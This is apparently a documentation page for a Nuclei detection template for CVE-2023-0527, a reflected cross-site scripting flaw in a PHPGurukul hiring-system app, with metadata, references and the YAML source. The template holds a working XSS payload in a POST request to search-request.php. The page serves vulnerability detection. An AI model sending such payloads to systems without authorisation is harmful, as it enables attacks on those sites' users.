Online Security Guards Hiring System - Cross-Site Scripting
ID: CVE-2023-0527
Severity: medium
Author: Harsh
Tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project
Description
Section titled “Description”A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php.
YAML Source
Section titled “YAML Source”id: CVE-2023-0527
info: name: Online Security Guards Hiring System - Cross-Site Scripting author: Harsh severity: medium description: | A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://vuldb.com/?ctiid.219596 - https://nvd.nist.gov/vuln/detail/CVE-2023-0527 - https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md - http://packetstormsecurity.com/files/172667/Online-Security-Guards-Hiring-System-1.0-Cross-Site-Scripting.html - https://vuldb.com/?id.219596 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0527 cwe-id: CWE-79 epss-score: 0.0047 epss-percentile: 0.75559 cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: online_security_guards_hiring_system_project product: online_security_guards_hiring_system tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project
http: - raw: - | POST /search-request.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
searchdata=<img%20src=x%20onerror=alert(document.domain)>&search=
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "<img src=x onerror=alert(document.domain)>")' - 'contains(body, "Online Security Gauard Hiring System |Search Request")' condition: and# digest: 490a00463044022070fdcfe35d683287a782f6821983ca9387f9e5c04d08240220c144d664472f9402204bdc5c2d1443cc4531b1892f1285240f2b637f8cbef98aaa7895702275e0493a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-0527.yaml"